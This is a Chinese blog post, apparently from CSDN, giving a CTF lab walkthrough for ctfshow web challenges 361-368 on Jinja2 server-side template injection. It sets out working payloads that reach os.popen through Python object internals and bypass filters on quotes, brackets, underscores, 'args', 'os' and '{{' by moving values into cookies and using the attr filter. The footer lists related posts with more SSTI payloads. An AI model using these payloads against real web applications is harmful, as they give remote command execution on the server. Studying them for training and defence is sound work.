ctfshow---web入门---SSTI(361-368)

最新推荐文章于 2024-06-05 19:48:10 发布
最新推荐文章于 2024-06-05 19:48:10 发布
阅读量452 收藏 4
点赞数 5
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80470992/article/details/136720481
版权

web361

根据题目给的“名字就是考点”,

所以构建playload

?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
  1. "".__class__: 获取空字符串的类,即str
  2. .__bases__[0]: 获取str类的基类,即objectobject是所有Python类的基类。
  3. .__subclasses__(): 获取object类所有的直接子类列表。
  4. [132]: 选择列表中的第133个子类(因为索引是从0开始的)。这个特定的子类是不确定的,因为它取决于Python的实现和可能加载的其他模块。
  5. .__init__: 获取该子类的初始化方法(如果存在的话)。
  6. .__globals__: 获取定义__init__方法的模块的全局变量字典。
  7. ['popen']: 从全局变量字典中获取名为popen的引用。这通常指的是os.popen函数,该函数用于执行一个命令并返回一个文件对象。

web362

根据题目"开始过滤"

可以试一试过滤,判断一下它过滤什么

测试数字

经过多次测试发现只有1和7没被过滤

绕过方法:用全角数字 ‘0’,‘1’,‘2’,‘3’,‘4’,‘5’,‘6’,‘7’,‘8’,‘9’

?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

web363

这一关也是过滤

具体过程就不说了,它是过滤了单双引号

payload:

?name={{x.__init__.__globals__[request.args.a].eval(request.args.b)}}&a=__builtins__&b=__import__('os').popen('cat /flag').read()

web364

也是过滤

只不过它过滤了args ,所以GET传参就不可以了

改用cookie 

?name={{x.__init__.__globals__[request.cookies.x1].eval(request.cookies.x2)}}
Cookie传参:x1=__builtins__;x2=__import__('os').popen('cat /flag').read()

web365

测试jinja2模板注入

这时候我们造一个字典跑一下过滤

过程就不说了

一共过滤了四个字符''""[args

我们选择用popen函数执行命令,其他五种方式同理。

先测测os模块在哪

{{x.__class__.__bases__.__getitem__(0).__subclasses__()}}

定位132

原始payload:

{{''.__class__.__bases__.__getitem__(0).__subclasses__()[132].__init__.__globals__.popen('ls /').read()}}

__getitem__绕过中括号[过滤:

{{x.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(132).__init__.__globals__.popen('ls /').read()}}

request对象绕过引号''""过滤,cookie或者values绕过args过滤

{{x.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(132).__init__.__globals__.popen(request.cookies.x).read()}}

Cookie传参:x=ls /

然后

Cookie传参:x=tac /f*

就完成了

web366

直接说结果,过滤了''""[args_

我们选择用popen函数执行命令

定位

{{x.__class__.__bases__.__getitem__(0).__subclasses__()}}

还是132

原始payload

{{(lipsum.__globals__).os.popen("tac /flag").read()}}

|attr()+request对象绕过对下划线_过滤。

request对象绕过引号''""过滤,cookie或者values绕过args过滤

{{(lipsum|attr(request.cookies.x1)).os.popen(request.cookies.x2).read()}}

Cookie传参:x1= __globals__;x2=tac /flag

web367

过滤了''""[args_os

{{(lipsum|attr(request.cookies.x1)).get(request.cookies.x2).popen(request.cookies.x3).read()}}

Cookie传参:x1= __globals__;x2=os;x3=tac /flag

web368

过滤了''""[args_os{{

比上题多过滤了一个{{,我们用{%print(......)%}绕过

payload

{%print((lipsum|attr(request.cookies.x1)).get(request.cookies.x2).popen(request.cookies.x3).read())%}

 

Cookie传参:x1= __globals__;x2=os;x3=tac /flag

怀慈药王
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
CTF-WEB入门DOC-2019版1
08-03
【CTF-WEB入门DOC-2019版1】主要涵盖了CTF竞赛与Web安全相关的基础知识和进阶技能,适合对网络安全有兴趣,尤其是希望在Web安全领域发展的人群。以下将详细介绍其中的关键知识点: 一、CTF简介及目标: CTF...
ctfshow-web368(SSTI)
m0_62094846的博客
05-05 473
用上两题的方法,有东西被过滤了 两个大括号被过滤了 也不知道是什么意思 ?name={% set po=dict(po=a,p=a)|join%} {% set a=(()|select|string|list)|attr(po)(24)%} {% set ini=(a,a,dict(init=a)|join,a,a)|join()%} {% set glo=(a,a,dict(globals=a)|join,a,a)|join()%} {% set geti=(a,a,dict(geti...
SSTI模板注入-中括号、args、下划线、单双引号、双大括号被过滤绕过(ctfshow web入门368
T1ngSh0w的博客
03-29 952
SSTI模板注入漏洞 中括号、args、下划线、单双引号、双大括号被过滤 ctfshow web入门368
CTFSHOW--SSTI字符串拼接绕过
最新发布
qq_75120258的博客
06-05 845
打开环境查看日志文件得到日志文件在UA头里写下一句话木马然后再发送,因为我传了很多次的一句话木马,所以添加了很多条日志信息进行POST传参。
ctfshow-web363(SSTI)
m0_62094846的博客
04-30 414
过滤了' ?name={{[].__class__.__base__.__subclasses__()}} ?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__}} 法一: 本来应该这样的 ?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']}} 但是单引号被过滤了 引...
ctfshow web入门 SSTI注入 web361--web368
2301_81040377的博客
05-15 362
过滤了中括号 下划线 单引号 双引号 globals、getitem args。说实话这里对py不太好的朋友有点不友好,因为payload都是py的。这里用popen方法来执行命令。上题一样的payload可以用。这里是把引号过滤了我们可以用。然后使用flask过滤器。上题一样的payload。hint:考点就是题目。
Ctfshow web入门 SSTI 模板注入篇 web361-web372 详细题解 全
Jay17的博客
08-10 1377
Ctfshow web入门 SSTI 模板注入篇 web361-web372 详细题解 全
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板。 模板引擎旨在通过将固定模板与易失性数据结合来生成网页。...
scant3r:ScanT3r-网络安全扫描仪
03-16
Scant3r-Web应用程序漏洞扫描程序为什么要使用Scant3r? scant3r将帮助您更快地编写自己的python脚本,无需配置http / threads / errors / options / etc ...,只需在脚本中编写main函数,即可在终端中运行它或访问...
nti2021-happyfarm
04-14
NTI CD关于信息安全的团队阶段。 工程挑战。... 在POST title参数(大概是Jinja2)中发现的SSTI一些关键字正在被过滤,而不一定是有效负载的一部分(例如config ) 此外,我们在以下方面收到了SSTI
Web】Ctfshow SSTI刷题记录1
uuzeray的博客
11-19 1215
题目给到Hint,尝试传?name={{1-1}}测试出ssti注入点。使用{%%}绕过,再借助print()回显。
ctfshow-ssti
weixin_74660472的博客
04-18 337
ssti漏洞原理ssti服务端模板注入,ssti主要为python的一些框架 jinja2 mako tornado django,PHP框架smarty twig,java框架jade velocity等等使用了渲染函数时,由于代码不规范或信任了用户输入而导致了服务端模板注入,模板渲染其实并没有漏洞,主要是程序员对代码不规范不严谨造成了模板注入漏洞,造成模板可控。本文着重对flask模板注入进行浅析。morePython对象的继承,用魔术方法一步步找到可利用的方法去执行。即找到父类。
CTFSHOW-SSTI
Monica的博客
11-12 4819
参考文章 SSTI模板注入绕过(进阶篇)_羽的博客-CSDN博客_ssti绕过
SSTI模板注入-单双引号被过滤绕过(ctfshow web入门363)
T1ngSh0w的博客
03-18 489
我们获取基类以及所有子类的时候,可以使用()或者[]来获取。当我们使用可以执行shell命令的方法时,必定要使用单引号或者双引号来包裹我们执行的命令,这时我们可以使用request.args.参数名或者request.values.参数名等传参方式将我们的命令等需要引号包裹的字符串进行传参即可。
ctfshow--SSTI
qq_51684648的博客
03-15 589
ctfshow–SSTI 361、 {{7*‘7’}}回显是7777777,判断是jinjia2模板。 {{''.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /f*').read()}} ''.__class__.mro__[1].__subclasses__()查看object下的所有子类集合。 362、 在__builtin__中有众多的可用函数,包括eval 1: ?name={{ur
ctfshow-SSTI
2301_80125214的博客
03-15 824
由题目提示可知url参数名应该是name,尝试输入name=world发现world被输出输入name={{7*7}},输出49,说明存在SSTI注入获取内置类对应的类获取object基类获得所有子类获得可以执行shell命令的子类执行命令name={{''.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('ls /').read()}}读取flag?
SSTI模板注入-args、单双引号被过滤绕过(ctfshow web入门364)
T1ngSh0w的博客
03-18 236
当单双引号被过滤时,我们使用()或者[]来获得我们所需要的类,并且我们是尝试使用传参的方式将我们的shell命令传进去执行,但是当args也被过滤的时候,我们就不能使用request.args.参数名 来进行传参了。我这里的绕过方法有两种,一种是我们获得chr()这个python的内置函数,chr(ascii值)函数接收一个字符的ascii码值然后将该ascii码值所对应的字符返回,这时我们就可以使用chr(ascii值)得到我们想要的字符,然后将其进行拼接成我们想要的字符串或者shell命令。
ctfshow SSTI
m0_74940843的博客
11-08 59
GET输入?说明注入点是?name获得内置类所对应的类获得object基类获得所有子类我们用python脚本观察是否含有’popen’列出根目录内容取得flag。
ssti-lab靶场通关
09-02
为了通关ssti-lab靶场,你可以按照以下步骤进行操作: 1. 首先,从上一个数据库中找到的password字典中获取到mssql的账户密码。 2. 使用这个账户密码进行mssql的暴力破解,以获得访问权限。 3. 一旦你获得了访问权限...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值